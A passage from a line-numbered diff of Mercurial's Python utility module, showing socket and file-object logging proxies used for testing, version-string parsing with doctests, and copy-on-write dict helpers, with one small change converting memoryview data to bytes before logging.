565 ``read()`` and ``readline()``.
566 """
566 """
567 def _fillbuffer(self):
567 def _fillbuffer(self):
568 res = super(observedbufferedinputpipe, self)._fillbuffer()
568 res = super(observedbufferedinputpipe, self)._fillbuffer()
569
569
570 fn = getattr(self._input._observer, r'osread', None)
570 fn = getattr(self._input._observer, r'osread', None)
571 if fn:
571 if fn:
572 fn(res, _chunksize)
572 fn(res, _chunksize)
573
573
574 return res
574 return res
575
575
576 # We use different observer methods because the operation isn't
576 # We use different observer methods because the operation isn't
577 # performed on the actual file object but on us.
577 # performed on the actual file object but on us.
578 def read(self, size):
578 def read(self, size):
579 res = super(observedbufferedinputpipe, self).read(size)
579 res = super(observedbufferedinputpipe, self).read(size)
580
580
581 fn = getattr(self._input._observer, r'bufferedread', None)
581 fn = getattr(self._input._observer, r'bufferedread', None)
582 if fn:
582 if fn:
583 fn(res, size)
583 fn(res, size)
584
584
585 return res
585 return res
586
586
587 def readline(self, *args, **kwargs):
587 def readline(self, *args, **kwargs):
588 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
588 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
589
589
590 fn = getattr(self._input._observer, r'bufferedreadline', None)
590 fn = getattr(self._input._observer, r'bufferedreadline', None)
591 if fn:
591 if fn:
592 fn(res)
592 fn(res)
593
593
594 return res
594 return res
595
595
596 PROXIED_SOCKET_METHODS = {
596 PROXIED_SOCKET_METHODS = {
597 r'makefile',
597 r'makefile',
598 r'recv',
598 r'recv',
599 r'recvfrom',
599 r'recvfrom',
600 r'recvfrom_into',
600 r'recvfrom_into',
601 r'recv_into',
601 r'recv_into',
602 r'send',
602 r'send',
603 r'sendall',
603 r'sendall',
604 r'sendto',
604 r'sendto',
605 r'setblocking',
605 r'setblocking',
606 r'settimeout',
606 r'settimeout',
607 r'gettimeout',
607 r'gettimeout',
608 r'setsockopt',
608 r'setsockopt',
609 }
609 }
610
610
611 class socketproxy(object):
611 class socketproxy(object):
612 """A proxy around a socket that tells a watcher when events occur.
612 """A proxy around a socket that tells a watcher when events occur.
613
613
614 This is like ``fileobjectproxy`` except for sockets.
614 This is like ``fileobjectproxy`` except for sockets.
615
615
616 This type is intended to only be used for testing purposes. Think hard
616 This type is intended to only be used for testing purposes. Think hard
617 before using it in important code.
617 before using it in important code.
618 """
618 """
619 __slots__ = (
619 __slots__ = (
620 r'_orig',
620 r'_orig',
621 r'_observer',
621 r'_observer',
622 )
622 )
623
623
624 def __init__(self, sock, observer):
624 def __init__(self, sock, observer):
625 object.__setattr__(self, r'_orig', sock)
625 object.__setattr__(self, r'_orig', sock)
626 object.__setattr__(self, r'_observer', observer)
626 object.__setattr__(self, r'_observer', observer)
627
627
628 def __getattribute__(self, name):
628 def __getattribute__(self, name):
629 if name in PROXIED_SOCKET_METHODS:
629 if name in PROXIED_SOCKET_METHODS:
630 return object.__getattribute__(self, name)
630 return object.__getattribute__(self, name)
631
631
632 return getattr(object.__getattribute__(self, r'_orig'), name)
632 return getattr(object.__getattribute__(self, r'_orig'), name)
633
633
634 def __delattr__(self, name):
634 def __delattr__(self, name):
635 return delattr(object.__getattribute__(self, r'_orig'), name)
635 return delattr(object.__getattribute__(self, r'_orig'), name)
636
636
637 def __setattr__(self, name, value):
637 def __setattr__(self, name, value):
638 return setattr(object.__getattribute__(self, r'_orig'), name, value)
638 return setattr(object.__getattribute__(self, r'_orig'), name, value)
639
639
640 def __nonzero__(self):
640 def __nonzero__(self):
641 return bool(object.__getattribute__(self, r'_orig'))
641 return bool(object.__getattribute__(self, r'_orig'))
642
642
643 __bool__ = __nonzero__
643 __bool__ = __nonzero__
644
644
645 def _observedcall(self, name, *args, **kwargs):
645 def _observedcall(self, name, *args, **kwargs):
646 # Call the original object.
646 # Call the original object.
647 orig = object.__getattribute__(self, r'_orig')
647 orig = object.__getattribute__(self, r'_orig')
648 res = getattr(orig, name)(*args, **kwargs)
648 res = getattr(orig, name)(*args, **kwargs)
649
649
650 # Call a method on the observer of the same name with arguments
650 # Call a method on the observer of the same name with arguments
651 # so it can react, log, etc.
651 # so it can react, log, etc.
652 observer = object.__getattribute__(self, r'_observer')
652 observer = object.__getattribute__(self, r'_observer')
653 fn = getattr(observer, name, None)
653 fn = getattr(observer, name, None)
654 if fn:
654 if fn:
655 fn(res, *args, **kwargs)
655 fn(res, *args, **kwargs)
656
656
657 return res
657 return res
658
658
659 def makefile(self, *args, **kwargs):
659 def makefile(self, *args, **kwargs):
660 res = object.__getattribute__(self, r'_observedcall')(
660 res = object.__getattribute__(self, r'_observedcall')(
661 r'makefile', *args, **kwargs)
661 r'makefile', *args, **kwargs)
662
662
663 # The file object may be used for I/O. So we turn it into a
663 # The file object may be used for I/O. So we turn it into a
664 # proxy using our observer.
664 # proxy using our observer.
665 observer = object.__getattribute__(self, r'_observer')
665 observer = object.__getattribute__(self, r'_observer')
666 return makeloggingfileobject(observer.fh, res, observer.name,
666 return makeloggingfileobject(observer.fh, res, observer.name,
667 reads=observer.reads,
667 reads=observer.reads,
668 writes=observer.writes,
668 writes=observer.writes,
669 logdata=observer.logdata,
669 logdata=observer.logdata,
670 logdataapis=observer.logdataapis)
670 logdataapis=observer.logdataapis)
671
671
672 def recv(self, *args, **kwargs):
672 def recv(self, *args, **kwargs):
673 return object.__getattribute__(self, r'_observedcall')(
673 return object.__getattribute__(self, r'_observedcall')(
674 r'recv', *args, **kwargs)
674 r'recv', *args, **kwargs)
675
675
676 def recvfrom(self, *args, **kwargs):
676 def recvfrom(self, *args, **kwargs):
677 return object.__getattribute__(self, r'_observedcall')(
677 return object.__getattribute__(self, r'_observedcall')(
678 r'recvfrom', *args, **kwargs)
678 r'recvfrom', *args, **kwargs)
679
679
680 def recvfrom_into(self, *args, **kwargs):
680 def recvfrom_into(self, *args, **kwargs):
681 return object.__getattribute__(self, r'_observedcall')(
681 return object.__getattribute__(self, r'_observedcall')(
682 r'recvfrom_into', *args, **kwargs)
682 r'recvfrom_into', *args, **kwargs)
683
683
684 def recv_into(self, *args, **kwargs):
684 def recv_into(self, *args, **kwargs):
685 return object.__getattribute__(self, r'_observedcall')(
685 return object.__getattribute__(self, r'_observedcall')(
686 r'recv_info', *args, **kwargs)
686 r'recv_info', *args, **kwargs)
687
687
688 def send(self, *args, **kwargs):
688 def send(self, *args, **kwargs):
689 return object.__getattribute__(self, r'_observedcall')(
689 return object.__getattribute__(self, r'_observedcall')(
690 r'send', *args, **kwargs)
690 r'send', *args, **kwargs)
691
691
692 def sendall(self, *args, **kwargs):
692 def sendall(self, *args, **kwargs):
693 return object.__getattribute__(self, r'_observedcall')(
693 return object.__getattribute__(self, r'_observedcall')(
694 r'sendall', *args, **kwargs)
694 r'sendall', *args, **kwargs)
695
695
696 def sendto(self, *args, **kwargs):
696 def sendto(self, *args, **kwargs):
697 return object.__getattribute__(self, r'_observedcall')(
697 return object.__getattribute__(self, r'_observedcall')(
698 r'sendto', *args, **kwargs)
698 r'sendto', *args, **kwargs)
699
699
700 def setblocking(self, *args, **kwargs):
700 def setblocking(self, *args, **kwargs):
701 return object.__getattribute__(self, r'_observedcall')(
701 return object.__getattribute__(self, r'_observedcall')(
702 r'setblocking', *args, **kwargs)
702 r'setblocking', *args, **kwargs)
703
703
704 def settimeout(self, *args, **kwargs):
704 def settimeout(self, *args, **kwargs):
705 return object.__getattribute__(self, r'_observedcall')(
705 return object.__getattribute__(self, r'_observedcall')(
706 r'settimeout', *args, **kwargs)
706 r'settimeout', *args, **kwargs)
707
707
708 def gettimeout(self, *args, **kwargs):
708 def gettimeout(self, *args, **kwargs):
709 return object.__getattribute__(self, r'_observedcall')(
709 return object.__getattribute__(self, r'_observedcall')(
710 r'gettimeout', *args, **kwargs)
710 r'gettimeout', *args, **kwargs)
711
711
712 def setsockopt(self, *args, **kwargs):
712 def setsockopt(self, *args, **kwargs):
713 return object.__getattribute__(self, r'_observedcall')(
713 return object.__getattribute__(self, r'_observedcall')(
714 r'setsockopt', *args, **kwargs)
714 r'setsockopt', *args, **kwargs)
715
715
716 class baseproxyobserver(object):
716 class baseproxyobserver(object):
717 def _writedata(self, data):
717 def _writedata(self, data):
718 if not self.logdata:
718 if not self.logdata:
719 if self.logdataapis:
719 if self.logdataapis:
720 self.fh.write('\n')
720 self.fh.write('\n')
721 self.fh.flush()
721 self.fh.flush()
722 return
722 return
723
723
724 # Simple case writes all data on a single line.
724 # Simple case writes all data on a single line.
725 if b'\n' not in data:
725 if b'\n' not in data:
726 if self.logdataapis:
726 if self.logdataapis:
727 self.fh.write(': %s\n' % stringutil.escapestr(data))
727 self.fh.write(': %s\n' % stringutil.escapestr(data))
728 else:
728 else:
729 self.fh.write('%s> %s\n'
729 self.fh.write('%s> %s\n'
730 % (self.name, stringutil.escapestr(data)))
730 % (self.name, stringutil.escapestr(data)))
731 self.fh.flush()
731 self.fh.flush()
732 return
732 return
733
733
734 # Data with newlines is written to multiple lines.
734 # Data with newlines is written to multiple lines.
735 if self.logdataapis:
735 if self.logdataapis:
736 self.fh.write(':\n')
736 self.fh.write(':\n')
737
737
738 lines = data.splitlines(True)
738 lines = data.splitlines(True)
739 for line in lines:
739 for line in lines:
740 self.fh.write('%s> %s\n'
740 self.fh.write('%s> %s\n'
741 % (self.name, stringutil.escapestr(line)))
741 % (self.name, stringutil.escapestr(line)))
742 self.fh.flush()
742 self.fh.flush()
743
743
744 class fileobjectobserver(baseproxyobserver):
744 class fileobjectobserver(baseproxyobserver):
745 """Logs file object activity."""
745 """Logs file object activity."""
746 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
746 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
747 logdataapis=True):
747 logdataapis=True):
748 self.fh = fh
748 self.fh = fh
749 self.name = name
749 self.name = name
750 self.logdata = logdata
750 self.logdata = logdata
751 self.logdataapis = logdataapis
751 self.logdataapis = logdataapis
752 self.reads = reads
752 self.reads = reads
753 self.writes = writes
753 self.writes = writes
754
754
755 def read(self, res, size=-1):
755 def read(self, res, size=-1):
756 if not self.reads:
756 if not self.reads:
757 return
757 return
758 # Python 3 can return None from reads at EOF instead of empty strings.
758 # Python 3 can return None from reads at EOF instead of empty strings.
759 if res is None:
759 if res is None:
760 res = ''
760 res = ''
761
761
762 if size == -1 and res == '':
762 if size == -1 and res == '':
763 # Suppress pointless read(-1) calls that return
763 # Suppress pointless read(-1) calls that return
764 # nothing. These happen _a lot_ on Python 3, and there
764 # nothing. These happen _a lot_ on Python 3, and there
765 # doesn't seem to be a better workaround to have matching
765 # doesn't seem to be a better workaround to have matching
766 # Python 2 and 3 behavior. :(
766 # Python 2 and 3 behavior. :(
767 return
767 return
768
768
769 if self.logdataapis:
769 if self.logdataapis:
770 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
770 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
771
771
772 self._writedata(res)
772 self._writedata(res)
773
773
774 def readline(self, res, limit=-1):
774 def readline(self, res, limit=-1):
775 if not self.reads:
775 if not self.reads:
776 return
776 return
777
777
778 if self.logdataapis:
778 if self.logdataapis:
779 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
779 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
780
780
781 self._writedata(res)
781 self._writedata(res)
782
782
783 def readinto(self, res, dest):
783 def readinto(self, res, dest):
784 if not self.reads:
784 if not self.reads:
785 return
785 return
786
786
787 if self.logdataapis:
787 if self.logdataapis:
788 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
788 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
789 res))
789 res))
790
790
791 data = dest[0:res] if res is not None else b''
791 data = dest[0:res] if res is not None else b''
792
793 # _writedata() uses "in" operator and is confused by memoryview because
794 # characters are ints on Python 3.
795 if isinstance(data, memoryview):
796 data = data.tobytes()
797
792 self._writedata(data)
798 self._writedata(data)
793
799
794 def write(self, res, data):
800 def write(self, res, data):
795 if not self.writes:
801 if not self.writes:
796 return
802 return
797
803
798 # Python 2 returns None from some write() calls. Python 3 (reasonably)
804 # Python 2 returns None from some write() calls. Python 3 (reasonably)
799 # returns the integer bytes written.
805 # returns the integer bytes written.
800 if res is None and data:
806 if res is None and data:
801 res = len(data)
807 res = len(data)
802
808
803 if self.logdataapis:
809 if self.logdataapis:
804 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
810 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
805
811
806 self._writedata(data)
812 self._writedata(data)
807
813
808 def flush(self, res):
814 def flush(self, res):
809 if not self.writes:
815 if not self.writes:
810 return
816 return
811
817
812 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
818 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
813
819
814 # For observedbufferedinputpipe.
820 # For observedbufferedinputpipe.
815 def bufferedread(self, res, size):
821 def bufferedread(self, res, size):
816 if not self.reads:
822 if not self.reads:
817 return
823 return
818
824
819 if self.logdataapis:
825 if self.logdataapis:
820 self.fh.write('%s> bufferedread(%d) -> %d' % (
826 self.fh.write('%s> bufferedread(%d) -> %d' % (
821 self.name, size, len(res)))
827 self.name, size, len(res)))
822
828
823 self._writedata(res)
829 self._writedata(res)
824
830
825 def bufferedreadline(self, res):
831 def bufferedreadline(self, res):
826 if not self.reads:
832 if not self.reads:
827 return
833 return
828
834
829 if self.logdataapis:
835 if self.logdataapis:
830 self.fh.write('%s> bufferedreadline() -> %d' % (
836 self.fh.write('%s> bufferedreadline() -> %d' % (
831 self.name, len(res)))
837 self.name, len(res)))
832
838
833 self._writedata(res)
839 self._writedata(res)
834
840
835 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
841 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
836 logdata=False, logdataapis=True):
842 logdata=False, logdataapis=True):
837 """Turn a file object into a logging file object."""
843 """Turn a file object into a logging file object."""
838
844
839 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
845 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
840 logdata=logdata, logdataapis=logdataapis)
846 logdata=logdata, logdataapis=logdataapis)
841 return fileobjectproxy(fh, observer)
847 return fileobjectproxy(fh, observer)
842
848
843 class socketobserver(baseproxyobserver):
849 class socketobserver(baseproxyobserver):
844 """Logs socket activity."""
850 """Logs socket activity."""
845 def __init__(self, fh, name, reads=True, writes=True, states=True,
851 def __init__(self, fh, name, reads=True, writes=True, states=True,
846 logdata=False, logdataapis=True):
852 logdata=False, logdataapis=True):
847 self.fh = fh
853 self.fh = fh
848 self.name = name
854 self.name = name
849 self.reads = reads
855 self.reads = reads
850 self.writes = writes
856 self.writes = writes
851 self.states = states
857 self.states = states
852 self.logdata = logdata
858 self.logdata = logdata
853 self.logdataapis = logdataapis
859 self.logdataapis = logdataapis
854
860
855 def makefile(self, res, mode=None, bufsize=None):
861 def makefile(self, res, mode=None, bufsize=None):
856 if not self.states:
862 if not self.states:
857 return
863 return
858
864
859 self.fh.write('%s> makefile(%r, %r)\n' % (
865 self.fh.write('%s> makefile(%r, %r)\n' % (
860 self.name, mode, bufsize))
866 self.name, mode, bufsize))
861
867
862 def recv(self, res, size, flags=0):
868 def recv(self, res, size, flags=0):
863 if not self.reads:
869 if not self.reads:
864 return
870 return
865
871
866 if self.logdataapis:
872 if self.logdataapis:
867 self.fh.write('%s> recv(%d, %d) -> %d' % (
873 self.fh.write('%s> recv(%d, %d) -> %d' % (
868 self.name, size, flags, len(res)))
874 self.name, size, flags, len(res)))
869 self._writedata(res)
875 self._writedata(res)
870
876
871 def recvfrom(self, res, size, flags=0):
877 def recvfrom(self, res, size, flags=0):
872 if not self.reads:
878 if not self.reads:
873 return
879 return
874
880
875 if self.logdataapis:
881 if self.logdataapis:
876 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
882 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
877 self.name, size, flags, len(res[0])))
883 self.name, size, flags, len(res[0])))
878
884
879 self._writedata(res[0])
885 self._writedata(res[0])
880
886
881 def recvfrom_into(self, res, buf, size, flags=0):
887 def recvfrom_into(self, res, buf, size, flags=0):
882 if not self.reads:
888 if not self.reads:
883 return
889 return
884
890
885 if self.logdataapis:
891 if self.logdataapis:
886 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
892 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
887 self.name, size, flags, res[0]))
893 self.name, size, flags, res[0]))
888
894
889 self._writedata(buf[0:res[0]])
895 self._writedata(buf[0:res[0]])
890
896
891 def recv_into(self, res, buf, size=0, flags=0):
897 def recv_into(self, res, buf, size=0, flags=0):
892 if not self.reads:
898 if not self.reads:
893 return
899 return
894
900
895 if self.logdataapis:
901 if self.logdataapis:
896 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
902 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
897 self.name, size, flags, res))
903 self.name, size, flags, res))
898
904
899 self._writedata(buf[0:res])
905 self._writedata(buf[0:res])
900
906
901 def send(self, res, data, flags=0):
907 def send(self, res, data, flags=0):
902 if not self.writes:
908 if not self.writes:
903 return
909 return
904
910
905 self.fh.write('%s> send(%d, %d) -> %d' % (
911 self.fh.write('%s> send(%d, %d) -> %d' % (
906 self.name, len(data), flags, len(res)))
912 self.name, len(data), flags, len(res)))
907 self._writedata(data)
913 self._writedata(data)
908
914
909 def sendall(self, res, data, flags=0):
915 def sendall(self, res, data, flags=0):
910 if not self.writes:
916 if not self.writes:
911 return
917 return
912
918
913 if self.logdataapis:
919 if self.logdataapis:
914 # Returns None on success. So don't bother reporting return value.
920 # Returns None on success. So don't bother reporting return value.
915 self.fh.write('%s> sendall(%d, %d)' % (
921 self.fh.write('%s> sendall(%d, %d)' % (
916 self.name, len(data), flags))
922 self.name, len(data), flags))
917
923
918 self._writedata(data)
924 self._writedata(data)
919
925
920 def sendto(self, res, data, flagsoraddress, address=None):
926 def sendto(self, res, data, flagsoraddress, address=None):
921 if not self.writes:
927 if not self.writes:
922 return
928 return
923
929
924 if address:
930 if address:
925 flags = flagsoraddress
931 flags = flagsoraddress
926 else:
932 else:
927 flags = 0
933 flags = 0
928
934
929 if self.logdataapis:
935 if self.logdataapis:
930 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
936 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
931 self.name, len(data), flags, address, res))
937 self.name, len(data), flags, address, res))
932
938
933 self._writedata(data)
939 self._writedata(data)
934
940
935 def setblocking(self, res, flag):
941 def setblocking(self, res, flag):
936 if not self.states:
942 if not self.states:
937 return
943 return
938
944
939 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
945 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
940
946
941 def settimeout(self, res, value):
947 def settimeout(self, res, value):
942 if not self.states:
948 if not self.states:
943 return
949 return
944
950
945 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
951 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
946
952
947 def gettimeout(self, res):
953 def gettimeout(self, res):
948 if not self.states:
954 if not self.states:
949 return
955 return
950
956
951 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
957 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
952
958
953 def setsockopt(self, res, level, optname, value):
959 def setsockopt(self, res, level, optname, value):
954 if not self.states:
960 if not self.states:
955 return
961 return
956
962
957 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
963 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
958 self.name, level, optname, value, res))
964 self.name, level, optname, value, res))
959
965
960 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
966 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
961 logdata=False, logdataapis=True):
967 logdata=False, logdataapis=True):
962 """Turn a socket into a logging socket."""
968 """Turn a socket into a logging socket."""
963
969
964 observer = socketobserver(logh, name, reads=reads, writes=writes,
970 observer = socketobserver(logh, name, reads=reads, writes=writes,
965 states=states, logdata=logdata,
971 states=states, logdata=logdata,
966 logdataapis=logdataapis)
972 logdataapis=logdataapis)
967 return socketproxy(fh, observer)
973 return socketproxy(fh, observer)
968
974
969 def version():
975 def version():
970 """Return version information if available."""
976 """Return version information if available."""
971 try:
977 try:
972 from . import __version__
978 from . import __version__
973 return __version__.version
979 return __version__.version
974 except ImportError:
980 except ImportError:
975 return 'unknown'
981 return 'unknown'
976
982
977 def versiontuple(v=None, n=4):
983 def versiontuple(v=None, n=4):
978 """Parses a Mercurial version string into an N-tuple.
984 """Parses a Mercurial version string into an N-tuple.
979
985
980 The version string to be parsed is specified with the ``v`` argument.
986 The version string to be parsed is specified with the ``v`` argument.
981 If it isn't defined, the current Mercurial version string will be parsed.
987 If it isn't defined, the current Mercurial version string will be parsed.
982
988
983 ``n`` can be 2, 3, or 4. Here is how some version strings map to
989 ``n`` can be 2, 3, or 4. Here is how some version strings map to
984 returned values:
990 returned values:
985
991
986 >>> v = b'3.6.1+190-df9b73d2d444'
992 >>> v = b'3.6.1+190-df9b73d2d444'
987 >>> versiontuple(v, 2)
993 >>> versiontuple(v, 2)
988 (3, 6)
994 (3, 6)
989 >>> versiontuple(v, 3)
995 >>> versiontuple(v, 3)
990 (3, 6, 1)
996 (3, 6, 1)
991 >>> versiontuple(v, 4)
997 >>> versiontuple(v, 4)
992 (3, 6, 1, '190-df9b73d2d444')
998 (3, 6, 1, '190-df9b73d2d444')
993
999
994 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1000 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
995 (3, 6, 1, '190-df9b73d2d444+20151118')
1001 (3, 6, 1, '190-df9b73d2d444+20151118')
996
1002
997 >>> v = b'3.6'
1003 >>> v = b'3.6'
998 >>> versiontuple(v, 2)
1004 >>> versiontuple(v, 2)
999 (3, 6)
1005 (3, 6)
1000 >>> versiontuple(v, 3)
1006 >>> versiontuple(v, 3)
1001 (3, 6, None)
1007 (3, 6, None)
1002 >>> versiontuple(v, 4)
1008 >>> versiontuple(v, 4)
1003 (3, 6, None, None)
1009 (3, 6, None, None)
1004
1010
1005 >>> v = b'3.9-rc'
1011 >>> v = b'3.9-rc'
1006 >>> versiontuple(v, 2)
1012 >>> versiontuple(v, 2)
1007 (3, 9)
1013 (3, 9)
1008 >>> versiontuple(v, 3)
1014 >>> versiontuple(v, 3)
1009 (3, 9, None)
1015 (3, 9, None)
1010 >>> versiontuple(v, 4)
1016 >>> versiontuple(v, 4)
1011 (3, 9, None, 'rc')
1017 (3, 9, None, 'rc')
1012
1018
1013 >>> v = b'3.9-rc+2-02a8fea4289b'
1019 >>> v = b'3.9-rc+2-02a8fea4289b'
1014 >>> versiontuple(v, 2)
1020 >>> versiontuple(v, 2)
1015 (3, 9)
1021 (3, 9)
1016 >>> versiontuple(v, 3)
1022 >>> versiontuple(v, 3)
1017 (3, 9, None)
1023 (3, 9, None)
1018 >>> versiontuple(v, 4)
1024 >>> versiontuple(v, 4)
1019 (3, 9, None, 'rc+2-02a8fea4289b')
1025 (3, 9, None, 'rc+2-02a8fea4289b')
1020
1026
1021 >>> versiontuple(b'4.6rc0')
1027 >>> versiontuple(b'4.6rc0')
1022 (4, 6, None, 'rc0')
1028 (4, 6, None, 'rc0')
1023 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1029 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1024 (4, 6, None, 'rc0+12-425d55e54f98')
1030 (4, 6, None, 'rc0+12-425d55e54f98')
1025 >>> versiontuple(b'.1.2.3')
1031 >>> versiontuple(b'.1.2.3')
1026 (None, None, None, '.1.2.3')
1032 (None, None, None, '.1.2.3')
1027 >>> versiontuple(b'12.34..5')
1033 >>> versiontuple(b'12.34..5')
1028 (12, 34, None, '..5')
1034 (12, 34, None, '..5')
1029 >>> versiontuple(b'1.2.3.4.5.6')
1035 >>> versiontuple(b'1.2.3.4.5.6')
1030 (1, 2, 3, '.4.5.6')
1036 (1, 2, 3, '.4.5.6')
1031 """
1037 """
1032 if not v:
1038 if not v:
1033 v = version()
1039 v = version()
1034 m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)
1040 m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)
1035 if not m:
1041 if not m:
1036 vparts, extra = '', v
1042 vparts, extra = '', v
1037 elif m.group(2):
1043 elif m.group(2):
1038 vparts, extra = m.groups()
1044 vparts, extra = m.groups()
1039 else:
1045 else:
1040 vparts, extra = m.group(1), None
1046 vparts, extra = m.group(1), None
1041
1047
1042 vints = []
1048 vints = []
1043 for i in vparts.split('.'):
1049 for i in vparts.split('.'):
1044 try:
1050 try:
1045 vints.append(int(i))
1051 vints.append(int(i))
1046 except ValueError:
1052 except ValueError:
1047 break
1053 break
1048 # (3, 6) -> (3, 6, None)
1054 # (3, 6) -> (3, 6, None)
1049 while len(vints) < 3:
1055 while len(vints) < 3:
1050 vints.append(None)
1056 vints.append(None)
1051
1057
1052 if n == 2:
1058 if n == 2:
1053 return (vints[0], vints[1])
1059 return (vints[0], vints[1])
1054 if n == 3:
1060 if n == 3:
1055 return (vints[0], vints[1], vints[2])
1061 return (vints[0], vints[1], vints[2])
1056 if n == 4:
1062 if n == 4:
1057 return (vints[0], vints[1], vints[2], extra)
1063 return (vints[0], vints[1], vints[2], extra)
1058
1064
1059 def cachefunc(func):
1065 def cachefunc(func):
1060 '''cache the result of function calls'''
1066 '''cache the result of function calls'''
1061 # XXX doesn't handle keywords args
1067 # XXX doesn't handle keywords args
1062 if func.__code__.co_argcount == 0:
1068 if func.__code__.co_argcount == 0:
1063 cache = []
1069 cache = []
1064 def f():
1070 def f():
1065 if len(cache) == 0:
1071 if len(cache) == 0:
1066 cache.append(func())
1072 cache.append(func())
1067 return cache[0]
1073 return cache[0]
1068 return f
1074 return f
1069 cache = {}
1075 cache = {}
1070 if func.__code__.co_argcount == 1:
1076 if func.__code__.co_argcount == 1:
1071 # we gain a small amount of time because
1077 # we gain a small amount of time because
1072 # we don't need to pack/unpack the list
1078 # we don't need to pack/unpack the list
1073 def f(arg):
1079 def f(arg):
1074 if arg not in cache:
1080 if arg not in cache:
1075 cache[arg] = func(arg)
1081 cache[arg] = func(arg)
1076 return cache[arg]
1082 return cache[arg]
1077 else:
1083 else:
1078 def f(*args):
1084 def f(*args):
1079 if args not in cache:
1085 if args not in cache:
1080 cache[args] = func(*args)
1086 cache[args] = func(*args)
1081 return cache[args]
1087 return cache[args]
1082
1088
1083 return f
1089 return f
1084
1090
1085 class cow(object):
1091 class cow(object):
1086 """helper class to make copy-on-write easier
1092 """helper class to make copy-on-write easier
1087
1093
1088 Call preparewrite before doing any writes.
1094 Call preparewrite before doing any writes.
1089 """
1095 """
1090
1096
1091 def preparewrite(self):
1097 def preparewrite(self):
1092 """call this before writes, return self or a copied new object"""
1098 """call this before writes, return self or a copied new object"""
1093 if getattr(self, '_copied', 0):
1099 if getattr(self, '_copied', 0):
1094 self._copied -= 1
1100 self._copied -= 1
1095 return self.__class__(self)
1101 return self.__class__(self)
1096 return self
1102 return self
1097
1103
1098 def copy(self):
1104 def copy(self):
1099 """always do a cheap copy"""
1105 """always do a cheap copy"""
1100 self._copied = getattr(self, '_copied', 0) + 1
1106 self._copied = getattr(self, '_copied', 0) + 1
1101 return self
1107 return self
1102
1108
1103 class sortdict(collections.OrderedDict):
1109 class sortdict(collections.OrderedDict):
1104 '''a simple sorted dictionary
1110 '''a simple sorted dictionary
1105
1111
1106 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1112 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1107 >>> d2 = d1.copy()
1113 >>> d2 = d1.copy()
1108 >>> d2
1114 >>> d2
1109 sortdict([('a', 0), ('b', 1)])
1115 sortdict([('a', 0), ('b', 1)])
1110 >>> d2.update([(b'a', 2)])
1116 >>> d2.update([(b'a', 2)])
1111 >>> list(d2.keys()) # should still be in last-set order
1117 >>> list(d2.keys()) # should still be in last-set order
1112 ['b', 'a']
1118 ['b', 'a']
1113 '''
1119 '''
1114
1120
1115 def __setitem__(self, key, value):
1121 def __setitem__(self, key, value):
1116 if key in self:
1122 if key in self:
1117 del self[key]
1123 del self[key]
1118 super(sortdict, self).__setitem__(key, value)
1124 super(sortdict, self).__setitem__(key, value)
1119
1125
1120 if pycompat.ispypy:
1126 if pycompat.ispypy:
1121 # __setitem__() isn't called as of PyPy 5.8.0
1127 # __setitem__() isn't called as of PyPy 5.8.0
1122 def update(self, src):
1128 def update(self, src):
1123 if isinstance(src, dict):
1129 if isinstance(src, dict):
1124 src = src.iteritems()
1130 src = src.iteritems()
1125 for k, v in src:
1131 for k, v in src:
1126 self[k] = v
1132 self[k] = v
1127
1133
1128 class cowdict(cow, dict):
1134 class cowdict(cow, dict):
1129 """copy-on-write dict
1135 """copy-on-write dict
1130
1136
1131 Be sure to call d = d.preparewrite() before writing to d.
1137 Be sure to call d = d.preparewrite() before writing to d.
1132
1138
1133 >>> a = cowdict()
1139 >>> a = cowdict()
1134 >>> a is a.preparewrite()
1140 >>> a is a.preparewrite()
1135 True
1141 True
1136 >>> b = a.copy()
1142 >>> b = a.copy()
1137 >>> b is a
1143 >>> b is a
1138 True
1144 True
1139 >>> c = b.copy()
1145 >>> c = b.copy()
1140 >>> c is a
1146 >>> c is a
1141 True
1147 True
1142 >>> a = a.preparewrite()
1148 >>> a = a.preparewrite()
1143 >>> b is a
1149 >>> b is a
1144 False
1150 False
1145 >>> a is a.preparewrite()
1151 >>> a is a.preparewrite()
1146 True
1152 True
1147 >>> c = c.preparewrite()
1153 >>> c = c.preparewrite()
1148 >>> b is c
1154 >>> b is c
1149 False
1155 False
